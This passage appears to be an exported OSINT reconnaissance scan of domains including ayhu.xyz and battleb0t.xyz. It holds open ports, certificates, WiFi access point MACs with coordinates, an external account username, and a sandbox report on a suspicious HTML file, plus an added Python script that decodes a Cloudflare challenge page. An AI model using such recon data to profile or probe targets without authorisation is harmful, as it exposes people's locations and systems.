Pxvv_Wf4vRraOQIcroiI7Bz-VZanQ8qRRCNJq9kL7QMtAUM-80bmDBTJgrVoo5PdyUEhsNJHqX9OXSul2XByOb4cFHCten8oYXlq-xQqbPW5cLy025uWQytdBIECEqK0e5vKcu_KE0Uj51a0tZyH3JcwbPPE_fH4pbZorm5Kg1q7pYpinkOp5o93d4llyQL17ps--AQEqRvOWDfy9ih2KJc_BE5lNLHq-v1h4WyL3qch3dFUNrf6TKv44d5E5ZODSf9MR91_YJ1LP3HF-0gnEEbwwFvu5w7kqPMreWbivd9zybQFoONhHZIvue3M
sgjfZ1vLvfzi0_pLzPV9XnL3aZnuVWNQ5m-tjTF6DVwD4heQQWtO8aBzn7YpoO7pmb5XcFPRZknXUl9vyibdHsym3ALRgx4Xf0sXY0Egq8vPrGtUmUt_qhEJTk5P3R0wsoRFa49pkuv79cmFbVV6UYUcsY_Ht1FZEPOAMMuij1BfHolOncuoa8HH91s4MToLK5e4ZXLCuwnrhU1Iz07g8_F8FiO-szvC0BSEfX52p_c3LsFOQ8KHGFOOtlIbkgQfFx7vErT1y0UZSuoR1HN5mwxz005itrk8qw-cU_4QXYVr0nnwhQQexYkVxHYLRxlHlGu9xonuO_9eyVCe8GyN79j4Enif4_dFDplAW77cjHRHWhMTCE5n_dU-96YMnkyFZr2m1KSUUWqQndQzduR6sMHEDQuErbPvLqIaJ3xphVgcTAzrMD12jvSU-bukvEL-wHHmzTDiCAItW9qw0XBzVZ7Ll736rJi4i9XorZ16wxKlOhw9SC6r707lQ43XMPgmmt8I71p5Y7NNqy-niBv8MJGeGRjObImH8n6JVBEQ7vEkMfTCD53zst2b-4V3RTMfSwntBlaoqZZYZdNBZBlFTqFK5PeKUk6cNexkn95wQmcJcuYO0vxq3IUpP6X">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '94216',
cRay: '7c5f60363a5a178c',
cHash: 'a8c2f7f784ba63b',
cUPMDTk: "\/?__cf_chl_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei8=',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: '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',
t: 'MTY4Mzg2MDA1My40NzkwMDA=',
m: 'X3NUo99x/4mGPFmrz69qVs5k5pJtmgeVcyYRkA87vXs=',
i1: 'Sn1NO9u6sfSr5lno+YjwEg==',
i2: 'LxAqQZecIh4w4zR/ETAJ7g==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f60363a5a178c');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f60363a5a178c';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
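The "Web Content Language" cell above is not ayhu.xyz's page; it is Cloudflare's managed challenge interstitial (title "Just a moment...", and `cf-mitigated: challenge` in the matching HTTP Headers row for http://ayhu.xyz/), so the language, header and WAF findings derived from it describe Cloudflare, not the origin. The `cRq` object inside `_cf_chl_opt` carries the original request base64-encoded: URL, User-Agent, method and a server-side timestamp that is also embedded in the `__cf_chl_*_tk` tokens. The following is an added example (not SpiderFoot code, not Cloudflare's) that flags such rows and decodes those fields from an excerpt of the cell; the decoded User-Agent is a Firefox 62 string, which fingerprints the scanner as a dated automated client and is consistent with it being challenged.

```python
"""Recognise a Cloudflare managed-challenge interstitial in scanner output
and recover the request context it embeds, so the row is not read as
content served by the target's origin."""
import base64
import re
from datetime import datetime, timezone

# Excerpt of the 'Web Content Language' cell for ayhu.xyz above (page data,
# reduced to the fields this example reads).
CHALLENGE_HTML = """<title>Just a moment...</title>
<script>
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cRay: '7c5f60363a5a178c',
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei8=',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
t: 'MTY4Mzg2MDA1My40NzkwMDA=',
}
};
</script>"""

# Response headers from the matching 'HTTP Headers' row for http://ayhu.xyz/
# (page data, trimmed).
CHALLENGE_HEADERS = {
    "server": "cloudflare",
    "cf-mitigated": "challenge",
    "cf-ray": "7c5f8c5e7988238a-EWR",
    "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate",
}


def is_cf_challenge(headers: dict, html: str = "") -> bool:
    """cf-mitigated: challenge is authoritative; the markup check is a
    fallback for rows that stored only the response body."""
    h = {k.lower(): v for k, v in headers.items()}
    if h.get("cf-mitigated", "").lower() == "challenge":
        return True
    return "_cf_chl_opt" in html and "Just a moment" in html


def _field(html: str, name: str):
    """Pull a single-quoted scalar out of the _cf_chl_opt object literal."""
    m = re.search(rf"\b{name}:\s*'([^']*)'", html)
    return m.group(1) if m else None


def _b64(s: str) -> str:
    return base64.b64decode(s).decode("utf-8")


def decode_challenge(html: str) -> dict:
    """cRq fields: ru = requested URL, ra = User-Agent, rm = method,
    t = epoch seconds the challenge was issued (matches the -<epoch>- part
    of the __cf_chl_f_tk / __cf_chl_rt_tk tokens on the same page)."""
    epoch = float(_b64(_field(html, "t")))
    return {
        "zone": _field(html, "cZone"),
        "type": _field(html, "cType"),
        "ray": _field(html, "cRay"),
        "url": _b64(_field(html, "ru")),
        "user_agent": _b64(_field(html, "ra")),
        "method": _b64(_field(html, "rm")),
        "epoch": epoch,
        "time_utc": datetime.fromtimestamp(epoch, tz=timezone.utc).isoformat(),
    }


if __name__ == "__main__":
    if is_cf_challenge(CHALLENGE_HEADERS, CHALLENGE_HTML):
        for k, v in decode_challenge(CHALLENGE_HTML).items():
            print(f"{k:>10}: {v}")
```

When triaging an export, treat any row whose body decodes this way as "blocked by the edge" and drop the derived Web Technology, HTTP Headers and Language findings for that URL, or re-fetch with a current browser profile before relying on them.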
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Lang Sky Harbor (Net ID: 00:03:93:E9:7A:05) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:08:40 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 185.199.109.154 | 185.199.109.153 |
| 2023-05-12 02:46:38 | Netblock Membership | No | RIPE | 2 | 0 | 3 | 0 | None | 34.74.160.0/20 | 34.74.170.74 |
| 2023-05-12 03:03:40 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0101kvmt.github.io |
| 2023-05-12 02:54:20 | Open TCP Port Banner | No | Censys | 0 | 0 | 4 | 0 | None | HTTP/1.1 404 Not Found
Server: Netlify
X-Nf-Request-Id: 01H06PCVJ4HBKTDMM1V2TTSTEZ
Date: <REDACTED>
Content-Length: 0
| 2600:1f18:2489:8200::c8 |
| 2023-05-12 02:54:15 | Linked URL - Internal | No | Web Spider | 7 | 0 | 2 | 0 | None | https://nwapi2.battleb0t.xyz/ | nwapi2.battleb0t.xyz |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | AIRTIES (Net ID: 00:12:BF:5F:88:E4) | 40.2024, 29.0398 |
| 2023-05-12 03:23:15 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.3:443 | 188.114.96.0/24 |
| 2023-05-12 02:44:05 | SSL Certificate - Issued by | No | CertSpotter | 0 | 0 | 1 | 0 | None | C=US,O=Let's Encrypt,CN=R3 | battleb0t.xyz |
| 2023-05-12 02:47:46 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 34.74.170.74:80 | 34.74.170.74 |
| 2023-05-12 02:55:01 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.96.1:2086 | 188.114.96.1 |
| 2023-05-12 02:44:58 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 2 | 0 | None | {u'region_code': u'CA', u'country_tld': u'.us', u'ip': u'185.199.110.153', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/Los_Angeles', u'city': u'San Francisco', u'network': u'185.199.108.0/22', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv4', u'latitude': 37.7809, u'in_eu': False, u'utc_offset': u'-0700', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'FASTLY', u'postal': u'94142', u'asn': u'AS54113', u'country': u'US', u'region': u'California', u'longitude': -122.4245, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} | 185.199.110.153 |
| 2023-05-12 03:24:22 | HTTP Headers | No | Web Spider | 10 | 0 | 2 | 0 | None | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=jsIMdWNoCwdQGyyZGyYA%2Bk%2F%2FuxOwhAu2H4z%2BlgqTotxGWPo8hqWsqluH0WQNJMNDxGIz%2FauzgzXUlj2TX7zY2FcfHDEdJ6DQfKAJa9S%2BlmMzgJ2oNDB%2FfptzTg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5e7988238a-EWR", "cross-origin-opener-policy": "same-origin"} | http://ayhu.xyz/ |
| 2023-05-12 03:03:36 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00p513-dev.github.io |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | snowzef (Net ID: 00:01:36:07:D6:9C) | 52.3759, 4.8975 |
| 2023-05-12 03:11:19 | Physical Location | No | AbstractAPI | 1 | 0 | 2 | 0 | None | Bursa, Bursa, 16350, Turkey, Asia | 87.248.157.102 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | OMNI (Net ID: 00:06:25:FA:6F:A7) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:53:39 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 185.199.108.153:80 | 185.199.108.153 |
| 2023-05-12 02:56:16 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 2 | 0 | None | Cloudflare Inc. Cloudflare | www.ayhu.xyz |
| 2023-05-12 02:52:43 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 2, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'YPO - Certified Act of the Ordinary Assembly.htm', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_a14_IESQMMUTEX_0_519"\n "UpdatingNewTabPageData"\n "IsoScope_a14_IESQMMUTEX_0_303"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_a14_ConnHashTable<2580>_HashTable_Mutex"\n "IsoScope_a14_IESQMMUTEX_0_331"\n "IsoScope_a14_IE_EarlyTabStart_0x344_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2580"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_a14_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_a14_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_a14_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': 
u'"185.199.108.153:80"\n "142.250.191.74:443"\n "142.251.46.225:443"\n "207.58.149.159:443"\n "185.199.108.153:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"queryfibre.github.io"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ajax.googleapis.com"\n "lh3.googleusercontent.com"\n "mastermanpublications.com"\n "query.prod.cms.msn.com"\n "queryfibre.github.io"\n "teredo.ipv6.microsoft.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "adbred_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarF55.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"loading_1_.gif" has type "GIF image data version 89a 144 x 68" and 
extension "gif"\n "back_1_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 baseline precision 8 1694x953 components 3" and extension "jpg"\n "pAxMM_1_.png" has type "PNG image data 160 x 14 8-bit/color RGBA non-interlaced" and extension "png"\n "microsoft_1_1_.png" has type "PNG image data 48 x 48 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002776]\n "Cab1689.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab1689.tmp]- [targetUID: 00000000-00002776]\n "CabF44.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabF44.tmp]- [targetUID: 00000000-00002776]'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\program files\\internet explorer\\iexplore.exe"\n "iexplore.exe" reads file 
"c:\\users\\%osuser%\\appdata\\local\\temp\\~df1354a31362cff700.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{f19685c7-eaba-11ed-831b-080027c8d963}.dat"\n "iexplore.exe" reads file "c:\\windows\\fonts\\staticcache.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{f19685c9-eaba-11ed-831b-080027c8d963}.dat"\n "iexplore.exe" reads file "c:\\users\\desktop.ini"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\imagestore\\3mt7jhv\\imagestore.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfe53b5c5f3cc72065.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df1354a31362cff700.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{f19685c7-eaba-11ed-831b-080027c8d963}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfe53b5c5f3cc72065.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{f19685c9-eaba-11ed-831b-080027c8d963}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"adbred_1_.svg" has type 
"SVG Scalable Vector Graphics image"- [targetUID: 00000000-00002580]\n "urlblockindex_1_.bin" has type "data"- [targetUID: 00000000-00002580]\n "urlref_httpqueryfibre.github.iov4seizle.css" has type "UTF-8 Unicode text with very long lines"- [targetUID: 00000000-00002580]\n "loading_1_.gif" has type "GIF image data version 89a 144 x 68"- [targetUID: 00000000-00002580]\n "TarF55.tmp" has type "data"- Location: [%TEMP%\\TarF55.tmp]- [targetUID: 00000000-00002776]\n "sip_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: 00000000-00002580]\n "jquery.min_1_.js" has type "ASCII text with very long lines"- [targetUID: 00000000-00002580]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002776]\n "d_2_" has type "Web Open Font Format CFF length 31000 version 0.0"- [targetUID: 00000000-00002580]\n "d_1_" has type "Web Open Font Format CFF length 30852 version 0.0"- [targetUID: 00000000-00002580]\n "d_1_" has type "Web Open Font Format CFF length 30812 version 0.0"- [targetUID: 00000000-00002580]\n "~DFE63417DCA6F3BF5E.TMP" has type "data"- Location: [%TEMP%\\~DFE63417DCA6F3BF5E.TMP]- [targetUID: 00000000-00002580]\n "back_1_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 baseline precision 8 1694x953 components 3"- [targetUID: 00000000-00002580]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00002580]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002580]\n "~DF479B344953954C5B.TMP" has type "data"- Location: 
[%TEMP%\\~DF479B344953954C5B.TMP]- [targetUID: 00000000-00002580]\n "~DF230A55C5ABF3CB5A.TMP" has type "data"- Location: [%TEMP%\\~DF230A55C5ABF3CB5A.TMP]- [targetUID: 00000000-00002580]\n "~DF1354A31362CFF700.TMP" has type "data"- Location: [%TEMP%\\~DF1354A31362CFF700.TMP]- [targetUID: 00000000-00002580]\n "~DFE53B5C5F3CC72065.TMP" has type "data"- Location: [%TEMP%\\~DFE53B5C5F3CC72065.TMP]- [targetUID: 00000000-0 | 185.199.108.153 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Junxion_Box (Net ID: 00:02:6F:3A:FE:C3) | 37.7642, -122.3993 |
| 2023-05-12 03:01:25 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.237): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:26 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Geocaching (Category: social)
https://www.geocaching.com/p/?u=Altpapier | Altpapier |
| 2023-05-12 02:50:16 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | panel.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:10:8b:16:97:4c:80:e7:56:d7:06:74:1e:45:16:d2:cf:08
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 18 13:27:58 2022 GMT
Not After : Mar 18 13:27:57 2023 GMT
Subject: CN=panel.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:ad:62:80:b3:4a:16:3f:d1:ca:02:76:24:cc:9e:
aa:84:81:39:ce:32:30:eb:2b:8e:c4:10:85:04:e9:
19:e1:2c:8b:f7:58:3e:cb:1c:ff:b5:a4:5e:3a:d3:
5f:cd:9f:7e:93:67:29:42:61:bd:af:c4:d3:ff:2c:
ba:88:7a:06:b8:ee:d1:0b:bb:86:7e:44:8f:c8:6e:
9f:15:1a:80:a4:23:08:22:e4:47:13:58:3b:f2:14:
1e:d6:ab:b0:0d:9a:3d:43:fa:19:c7:62:73:68:d3:
e8:e2:e0:f2:f8:19:08:fa:27:87:9f:f6:00:ca:15:
68:32:25:1a:17:ab:c2:10:cf:ee:c4:5c:e1:5a:4c:
7f:24:75:c4:d7:a8:bb:65:e9:41:ed:b3:2d:c0:d3:
43:15:31:0d:92:7c:15:d2:74:91:60:11:b3:a9:c4:
23:1e:bd:9f:cd:65:52:70:48:15:e3:b8:f4:be:c0:
7b:19:6d:7b:06:84:b9:fd:58:0b:97:47:76:a2:75:
8a:02:5c:f4:a0:74:5a:14:c3:00:00:11:33:ca:09:
cb:4f:f9:83:06:46:d2:9c:09:dd:c0:9e:5b:21:5b:
9d:26:54:f2:ef:8a:39:ff:fb:2e:d5:3b:31:32:7d:
8d:f4:d5:b5:c2:47:2c:44:11:4c:77:93:b1:be:73:
3c:fd:f8:ad:ee:38:c8:cc:7c:fd:93:89:87:7c:f1:
ff:7e:d9:02:fc:16:a4:8b:6d:44:ce:9d:18:99:9a:
80:ce:7f:84:4a:5f:f2:64:78:f3:c5:e5:c6:c7:66:
3e:15:14:9a:10:d3:79:7b:53:46:72:6c:1d:43:1a:
b1:35:e5:15:1e:25:f5:a3:42:b9:f7:c3:cc:11:45:
0d:91:92:d0:7c:af:f5:38:d6:f6:5b:a6:85:e8:1b:
87:47:00:ae:a6:0b:b0:8b:45:d2:80:d3:a6:4d:e2:
fe:d5:6d:a5:c3:c6:cb:5d:f4:1c:79:c6:67:7f:4c:
cd:e5:9e:5e:f5:60:0e:99:47:13:b5:ed:4f:e1:0e:
26:01:e6:84:00:6a:80:a9:fd:0c:5d:16:61:ba:be:
ee:5f:41:8c:41:20:95:45:47:52:41:85:d1:cc:b2:
ba:00:26:e3:48:1b:65:5b:e0:7a:f5:04:7c:c4:32:
1f:ac:c5:99:05:ef:49:b1:5a:de:e3:c4:60:e2:03:
33:84:8a:7a:ad:eb:d2:0c:0c:ff:c4:c2:64:33:29:
15:c7:0a:73:e3:0f:ee:4a:08:a2:6b:f1:e4:95:67:
2f:52:99:fd:3e:6c:01:2d:31:33:10:f6:db:5c:20:
7c:3b:ba:79:4b:c3:c0:d7:a8:e3:f0:e3:c9:f6:e5:
3c:bf:e5
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
A8:1A:0A:B4:5A:C9:CB:04:98:CA:A0:D2:67:45:9B:9C:A4:98:23:12
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:panel.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
9f:12:eb:4c:27:a2:ab:ae:53:fe:36:76:0d:83:48:c0:c4:51:
c2:09:08:23:27:a9:7b:35:32:d3:06:cd:e1:f3:c9:4c:2b:19:
5c:05:3a:7d:46:7b:96:78:c2:2b:09:8f:17:00:fe:1b:3e:53:
fd:3e:2f:c3:9a:b5:30:cd:5b:63:83:4a:da:77:e7:97:a3:c7:
12:1d:4e:2a:c8:68:c9:ed:8a:5e:32:c1:3c:96:1c:3b:30:00:
ed:b7:3d:b1:2e:45:01:68:3f:9d:92:c2:b8:d6:0d:29:ff:f9:
fd:d1:fa:45:c6:29:5f:fe:71:3e:28:8a:cb:d6:9d:51:d9:27:
23:c9:0e:6b:80:7d:c0:dc:b5:f6:e5:58:0d:23:ef:dc:ee:f1:
9f:7c:9d:ea:60:0a:da:5d:a8:81:7a:f0:00:9e:67:b5:ff:9a:
9e:41:d0:47:44:a3:ef:c7:76:fc:d5:d2:2e:9c:0a:d5:6e:f6:
ca:dd:e7:c4:7f:f4:80:04:e6:a2:ea:80:8a:fc:f5:3e:75:14:
53:f6:18:aa:9c:3c:71:e7:0e:04:2f:51:6f:57:cc:c7:59:90:
